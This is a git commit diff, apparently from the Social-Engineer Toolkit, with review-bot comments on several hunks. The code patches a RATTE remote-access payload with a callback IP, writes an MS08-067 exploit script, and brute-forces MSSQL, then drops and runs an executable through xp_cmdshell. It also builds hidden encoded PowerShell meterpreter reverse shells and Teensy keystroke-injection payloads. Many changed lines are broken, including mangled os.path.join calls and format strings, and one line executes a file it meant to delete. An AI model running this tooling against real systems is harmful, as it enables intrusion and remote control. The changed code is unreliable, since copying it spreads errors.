fasttrack fixes and version bump

TrustedSec 2016-07-30 15:18:20 -04:00
parent 46324916e6
commit 98b85deae4
15 changed files with 95 additions and 81 deletions


@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
############ ############
# PATCH Server IP into RATTE # PATCH Server IP into RATTE
############ ############
with open(os.path.join(core.setdir, "ratteM.exe"), "wb") as filewrite: with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X" host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y" r_port = (len(str(ratteport)) + 1) * "Y"
@ -126,7 +126,7 @@ def main():
############ ############
prepare_ratte(ipaddr, ratteport, persistent, customexe) prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe")) core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
################### ###################
# start ratteserver # start ratteserver
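Review bot: `os.path.join(core.setdir + "ratteM.exe")` on the open() line and on the matching print_status line is a single-argument join, which returns its argument unchanged, so the path is right only because setdir now happens to end in a separator. Either keep the two-argument form `os.path.join(core.setdir, "ratteM.exe")` or drop the no-op wrapper and write `core.setdir + "ratteM.exe"` so the dependency on the trailing separator is visible. prepare_ratte and main both begin before and continue after their hunks.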


@ -1,3 +1,12 @@
~~~~~~~~~~~~~~~~
version 7.3.4
~~~~~~~~~~~~~~~~
* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid
* fixed an issue that would cause UDP to not work properly when scanning subnet ranges
* improved handling and descriptions in mssql
* fixed error in mssql bruter
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 7.3.3 version 7.3.3
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~


@ -45,7 +45,7 @@ if operating_system == "posix":
else: else:
proxy_string = "export http_proxy='http://{0}'".format(proxy) proxy_string = "export http_proxy='http://{0}'".format(proxy)
with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite: with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite:
filewrite.write(proxy_string) filewrite.write(proxy_string)
def kill_proc(port, flag): def kill_proc(port, flag):


@ -97,11 +97,14 @@ try:
iprange = iprange.split(",") iprange = iprange.split(",")
for host in iprange: for host in iprange:
sqlport = get_sql_port(host) sqlport = get_sql_port(host)
if sqlport != None: print_status("Found SQL port on IP Address: %s and on port: %s" % (host, sqlport))
if sqlport == None: if sqlport == None:
sql_nmap_scan(host) nmapscan = sql_nmap_scan(host)
if sql_nmap_scan != None: if nmapscan != "":
sql_servers = sql_servers + \ sql_servers = sql_servers + \
host + ":" + "1433" + "," host + ":" + "1433" + ","
print_status("Found a SQL port on IP Address: %s and on port: 1433" % (host))
if nmapscan == "": print_warning("Unable to find a SQL server on IP: %s" % (host))
if sqlport != None: if sqlport != None:
sql_servers = sql_servers + \ sql_servers = sql_servers + \
host + ":" + sqlport + "," host + ":" + sqlport + ","
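Review bot: `if sqlport == None:` and `if sqlport != None:` should be `is None` / `is not None` (PEP 8), and the paired `if nmapscan != "":` / `if nmapscan == "":` tests on the same value read better as a single if/else. The new branch also assumes sql_nmap_scan returns a string; if it can return None the way get_sql_port evidently does, `None != ""` is true and the host would be recorded on 1433 even though nothing was found, so the helper's return value should be checked. The enclosing try block starts before this hunk.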


@ -1 +1 @@
7.3.3 7.3.4


@ -1662,7 +1662,7 @@ def start_dns():
def setdir(): def setdir():
if check_os() == "posix": if check_os() == "posix":
return os.path.join(os.path.expanduser('~'), '.set') return os.path.join(os.path.expanduser('~'), '.set' + '/')
if check_os() == "windows": if check_os() == "windows":
return "src/program_junk/" return "src/program_junk/"
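Review bot: `'.set' + '/'` hides why the trailing separator matters; `os.path.join(os.path.expanduser('~'), '.set', '')` produces the same trailing separator explicitly and with os.sep, and a comment such as `# keep the trailing separator: callers build paths as core.setdir + "name"` would record the contract the rest of this commit now relies on. The function also falls off the end and returns None when check_os() reports neither "posix" nor "windows", which the new concatenating callers would turn into a TypeError; whether that can happen depends on check_os, which is not in the hunk.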


@ -44,8 +44,8 @@ def launch():
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..") core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block # try/catch block
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
os.path.join(core.setdir, "autopwn.answer"))) os.path.join(core.setdir + "autopwn.answer")))
child.interact() child.interact()
# handle exceptions and log them # handle exceptions and log them
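Review bot: `os.path.join(core.meta_path + 'msfconsole')` uses `core.meta_path` without calling it, while every other hunk in this commit invokes it as `core.meta_path()`; if it is that function, the concatenation raises TypeError before pexpect.spawn runs and the surrounding try/except will swallow it. The line should read `os.path.join(core.meta_path(), 'msfconsole')`. launch() continues past the hunk, so the except handler itself is not visible here.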


@ -17,7 +17,7 @@ except NameError:
def create_rc(revhost, victim, payload, port): def create_rc(revhost, victim, payload, port):
with open("/root/.set/ms08-067.rc", "w") as filewrite: with open("/root/.set/ms08-067.rc" + "w") as filewrite:
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n" filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
"set payload {0}\n" "set payload {0}\n"
"set RHOST {1}\n" "set RHOST {1}\n"
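Review bot: `open("/root/.set/ms08-067.rc" + "w")` concatenates the mode into the filename, so it opens `/root/.set/ms08-067.rcw` in the default read mode and the filewrite.write() that follows fails (or open itself raises FileNotFoundError); it should be `open("/root/.set/ms08-067.rc", "w")`. The hard-coded /root path also bypasses the core.setdir location used everywhere else in this commit, though whether core is imported in this module is not visible in the hunk. create_rc's body continues past the hunk.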


@ -96,6 +96,7 @@ def brute(ipaddr, username, port, wordlist):
def deploy_hex2binary(ipaddr, port, username, password): def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option # base variable used to select payload option
option = None option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port), conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username, username,
@ -152,6 +153,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
choice1 = input("1.) Use Metasploit (default)\n" choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n" "2.) Select your own\n\n"
"Enter your choice[1]:") "Enter your choice[1]:")
if choice1 == "": if choice1 == "":
choice1 = "1" choice1 = "1"
@ -177,8 +179,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
# if we are using a SET interactive shell payload then we need to make # if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set # the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir, "set.payload")): if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir, "web_clone") web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit # then we are using metasploit
else: else:
if operating_system == "posix": if operating_system == "posix":
@ -187,12 +189,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
if not os.path.isfile(core.setdir + "1msf.exe"): if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then # move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait() (core.setdir + core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.setdir + core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.setdir + core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path, "1msf.exe") payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen: with open(payload_filename, "rb") as fileopen:
# read in the binary # read in the binary
@ -201,12 +203,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
data = binascii.hexlify(data) data = binascii.hexlify(data)
# we write out binary out to a file # we write out binary out to a file
with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite: with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data) filewrite.write(data)
if choice1 == "1": if choice1 == "1":
# if we are using metasploit, start the listener # if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir, "set.payload")): if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix": if operating_system == "posix":
try: try:
core.module_reload(pexpect) core.module_reload(pexpect)
@ -214,8 +216,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
import pexpect import pexpect
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path() msf_path = core.meta_path()
child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir, "meta_config"))) os.path.join(core.setdir + "meta_config")))
# random executable name # random executable name
random_exe = core.generate_random_string(10, 15) random_exe = core.generate_random_string(10, 15)
@ -239,7 +241,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
@ -249,23 +251,23 @@ def deploy_hex2binary(ipaddr, port, username, password):
import src.payloads.powershell.prep import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell")) os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as x86: with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, " core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
filewrite.write(x86) filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc # if our payload is x86 based - need to prep msfconsole rc
if payload == "x86": if payload == "x86":
powershell_command = x86 powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite: with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n" "set lport {0}\n"
@ -284,8 +286,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
import pexpect import pexpect
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc"))) os.path.join(core.setdir + "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metaploit takes a little bit to start...") core.print_status("Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000) child2.expect("Starting the payload handler", timeout=30000)
@ -304,7 +306,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
# here we start the conversion and execute the payload # here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.") core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time # read in the file 900 bytes at a time
with open(os.path.join(core.setdir, 'payload.hex')) as fileopen: with open(os.path.join(core.setdir + 'payload.hex')) as fileopen:
core.print_status("Dropping initial begin certificate header...") core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
for data in fileopen.read(900).rstrip(): for data in fileopen.read(900).rstrip():
@ -325,10 +327,10 @@ def deploy_hex2binary(ipaddr, port, username, password):
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload # if we are using SET payload
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir, "set.payload")): if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status("Spawning separate child process for listener...") core.print_status("Spawning separate child process for listener...")
try: try:
shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath) shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
except: except:
pass pass
@ -361,8 +363,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "2": if option == "2":
core.print_status("Triggering payload stager...") core.print_status("Triggering payload stager...")
alphainject = "" alphainject = ""
if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")): if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen: with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read() alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
@ -370,9 +372,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
thread.start_new_thread(conn.execute_query, (sql_command,)) thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1) time.sleep(1)
# if pexpect doesnt exit right then it freaks out # if pexpect doesnt exit right then it freaks out
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir, "set.payload")): if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py") os.system("python ../../payloads/set_payloads/listener.py")
try: try:
# interact with the child process through pexpect # interact with the child process through pexpect
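Review bot: The three cp lines now pass `(core.setdir + core.setdir)` to a format string with two `%s` placeholders; that is a single str rather than a tuple, so each raises `TypeError: not enough arguments for format string` and the 1msf.exe staging never happens — restore `(core.setdir, core.setdir)` on all three. Separately, `"{0}-r {1}"` in the listener spawn has no space before `-r`, producing a command like `…/msfconsole-r …` that cannot be found. Since these copies are of known local paths, `shutil.copy` would also avoid the shell=True invocations. deploy_hex2binary starts before the first hunk and continues after the last.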


@ -68,7 +68,7 @@ try:
if port == "": if port == "":
port = "443" port = "443"
core.update_options("PORT={0}".format(port)) core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port)) filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
@ -80,14 +80,14 @@ try:
import src.payloads.powershell.prep import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell")) os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
x86 = fileopen.read() x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86) filewrite.write(x86)
payload = "windows/meterpreter/reverse_https\n" # if we are using x86 payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command command = x86 # assign powershell to command
@ -113,8 +113,8 @@ try:
# launch metasploit below # launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.") core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")), os.path.join(core.setdir + "reports/powershell/powershell.rc")),
shell=True).wait() shell=True).wait()
# handle exceptions # handle exceptions
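Review bot: `open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w"))` passes the mode `"w"` to os.path.join as a path component, so the file is opened read-only at `…/x86_powershell_injection.txt/w` and either open or the following write fails; the line should be `open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")`. The commit touched this line without correcting it. The enclosing try starts before the hunk.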


@ -48,7 +48,7 @@ Next
'''.format(sms_server, package_id) '''.format(sms_server, package_id)
# write out the file to reports # write out the file to reports
with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite: with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration) filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.") core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.") core.print_status("You need to copy the script to the startup folder of the server.")


@ -246,7 +246,7 @@ except KeyboardInterrupt:
print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...") print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...")
# grab msfvenom alphanumeric shellcode to be inserted into shellexec # grab msfvenom alphanumeric shellcode to be inserted into shellexec
proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path(), "msfvenom"), proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path() + "msfvenom"),
payload, payload,
ipaddr, ipaddr,
port, port,
@ -440,15 +440,15 @@ Keyboard.send_now();
}}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload)) }}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload))
# delete temporary file # delete temporary file
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir, "/reports/binary2teensy.pde"))) print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir + "/reports/binary2teensy.pde")))
# write the teensy.pde file out # write the teensy.pde file out
with open(os.path.join(core.setdir, "/reports/binary2teensy.pde"), 'w') as filewrite: with open(os.path.join(core.setdir + "/reports/binary2teensy.pde"), 'w') as filewrite:
# write the teensy.pde file out # write the teensy.pde file out
filewrite.write(output_variable) filewrite.write(output_variable)
print(" [*] Generating a listener...") print(" [*] Generating a listener...")
# create our metasploit answer file # create our metasploit answer file
with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite: with open(os.path.join(core.setdir + "answer.txt", "w")) as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload {0}\n" "set payload {0}\n"
"set LHOST {1}\n" "set LHOST {1}\n"
@ -456,9 +456,9 @@ with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite:
"{3}\n" "{3}\n"
"exploit -j".format(payload, ipaddr, port, url)) "exploit -j".format(payload, ipaddr, port, url))
# spawn a multi/handler listener # spawn a multi/handler listener
subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir, "answer.txt")), shell=True).wait() subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir + "answer.txt")), shell=True).wait()
print(" [*] Housekeeping old files...") print(" [*] Housekeeping old files...")
# if our answer file is still there (which it should be), then remove it # if our answer file is still there (which it should be), then remove it
if os.path.isfile(os.path.join(core.setdir, "answer.txt")): if os.path.isfile(os.path.join(core.setdir + "answer.txt")):
# remove the old file, no longer used once we've exited # remove the old file, no longer used once we've exited
subprocess.Popen(os.path.join(core.setdir, "answer.txt"), shell=True).wait() subprocess.Popen(os.path.join(core.setdir + "answer.txt"), shell=True).wait()
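Review bot: `open(os.path.join(core.setdir + "answer.txt", "w"))` puts the mode inside os.path.join, so the rc file is opened read-only at `…/answer.txt/w` and the write fails; it should be `with open(core.setdir + "answer.txt", "w") as filewrite:`. The last line, under the comment "remove the old file", runs `subprocess.Popen(os.path.join(core.setdir + "answer.txt"), shell=True)`, which executes the answer file as a shell command instead of deleting it; `os.remove(core.setdir + "answer.txt")` does what the comment says, and `os.remove(random_filename)` can replace the shell `rm` earlier in the hunk. The with-block started here is the one whose remaining lines appear in the following hunk.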


@ -24,18 +24,18 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp" payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep # create base metasploit payload to pass to powershell.prep
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite: with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload) filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ") ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ") port = input("Enter the port for the reverse: ")
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite: with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode) filewrite.write(shellcode)
time.sleep(3) time.sleep(3)
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
pass pass
# read in x amount of bytes # read in x amount of bytes
data_read = int(50) data_read = int(50)
@ -149,10 +149,10 @@ Keyboard.set_key1(0);
Keyboard.send_now(); Keyboard.send_now();
} }
""") """)
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde"))) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")): if not os.path.isdir(os.path.join(core.setdir + "reports")):
os.makedirs(os.path.join(core.setdir, "reports")) os.makedirs(os.path.join(core.setdir + "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite: with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy) filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ") choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES": if choice == "YES":
@ -170,7 +170,7 @@ if choice == "YES":
else: else:
port = input("Enter the port to connect back on: ") port = input("Enter the port to connect back on: ")
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite: with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload {0}\n" "set payload {0}\n"
"set LHOST {1}\n" "set LHOST {1}\n"
@ -180,8 +180,8 @@ if choice == "YES":
print("[*] Launching Metasploit....") print("[*] Launching Metasploit....")
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir, "metasploit.answers"))) os.path.join(core.setdir + "metasploit.answers")))
child.interact() child.interact()
except: except:
pass pass
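Review bot: Three writes in this file pass the mode to os.path.join instead of open(): `open(os.path.join(core.setdir + 'x86.powershell', 'w'))`, `open(os.path.join(core.setdir + "/reports/teensy.pde", "w"))` and `open(os.path.join(core.setdir + "/metasploit.answers", "w"))` each open `<path>/w` read-only, so the shellcode, PDE and handler rc are never written. They should be `open(core.setdir + 'x86.powershell', 'w')`, `open(core.setdir + "/reports/teensy.pde", "w")` and `open(core.setdir + "/metasploit.answers", "w")`. The `with open(...) as fileopen: pass` after the sleep opens x86.powershell and does nothing with it, which is pre-existing but worth either reading the file there or dropping the block.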


@ -30,8 +30,8 @@ if operating_system != "windows":
import pexpect import pexpect
# check to see if setdir is created # check to see if setdir is created
if not os.path.isdir(os.path.join(core.setdir, "reports")): if not os.path.isdir(os.path.join(core.setdir + "reports")):
os.makedirs(os.path.join(core.setdir, "reports")) os.makedirs(os.path.join(core.setdir + "reports"))
definepath = os.getcwd() definepath = os.getcwd()
# define if use apache or not # define if use apache or not
@ -57,7 +57,7 @@ for line in apache_check:
# grab info from config file # grab info from config file
with open(os.path.join(core.setdir, "teensy")) as fileopen: with open(os.path.join(core.setdir + "teensy")) as fileopen:
counter = 0 counter = 0
payload_counter = 0 payload_counter = 0
choice = None choice = None
@ -77,14 +77,14 @@ with open(os.path.join(core.setdir, "teensy")) as fileopen:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr) core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")): if not os.path.isfile(os.path.join(core.setdir + "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.") core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set() core.exit_set()
def writefile(filename, now): def writefile(filename, now):
with open(os.path.join("src/teensy", filename)) as fileopen, \ with open(os.path.join("src/teensy" + filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite: open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
for line in fileopen: for line in fileopen:
match = re.search("IPADDR", line) match = re.search("IPADDR", line)
@ -128,8 +128,8 @@ if choice == "13":
# save our stuff here # save our stuff here
print(core.bcolors.BLUE + print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir, "\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir +
"reports", "reports" +
"teensy_{0}.pde".format(now))) + "teensy_{0}.pde".format(now))) +
core.bcolors.ENDC) core.bcolors.ENDC)
print(core.bcolors.GREEN + print(core.bcolors.GREEN +
@ -142,29 +142,29 @@ print(core.bcolors.RED +
pause = input("Press {return} to continue.") pause = input("Press {return} to continue.")
if payload_counter == 1: if payload_counter == 1:
webclone_path = os.path.join(core.setdir, "web_clone") webclone_path = os.path.join(core.setdir + "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe") metasploit_exec_path = os.path.join(core.setdir + "msf.exe")
if not apache: if not apache:
subprocess.Popen("mkdir {0};" subprocess.Popen("mkdir {0};"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path, "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path +
metasploit_exec_path, metasploit_exec_path +
os.path.join(webclone_path, "x.exe")), os.path.join(webclone_path + "x.exe")),
shell=True).wait() shell=True).wait()
if operating_system != "windows": if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py") child = pexpect.spawn("python src/html/web_server.py")
else: else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait() subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")): if os.path.isfile(os.path.join(core.setdir + "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...") print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
